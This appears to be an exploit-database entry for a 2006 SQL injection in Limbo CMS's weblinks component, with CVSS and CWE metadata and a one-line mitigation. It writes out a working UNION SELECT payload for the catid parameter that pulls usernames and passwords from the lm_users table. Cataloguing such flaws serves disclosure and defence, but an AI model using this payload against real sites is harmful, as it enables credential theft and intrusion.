vendor:
Limbo CMS
by:
milw0rm.com
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Limbo CMS
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006
Limbo CMS (option=weblinks) sql injection exploit
This exploit allows an attacker to gain access to the username and password of a user in the Limbo CMS system. The attacker can send a malicious GET request to the index.php page with the option=weblinks parameter and an additional parameter of catid=-1 union select 0,1,2,concat(char(0x6c,0x6f,0x67,0x69,0x6e,0x3a),username,char(0x20,0x70,0x61,0x73,0x73,0x77,0x6f,0x72,0x64,0x3a),password),4,5,6,7,8,9,10,11 from lm_users where id=[user_id]/*. This will return the username and password of the user with the specified user_id.
Mitigation:
Ensure that user input is properly sanitized and validated before being used in a SQL query.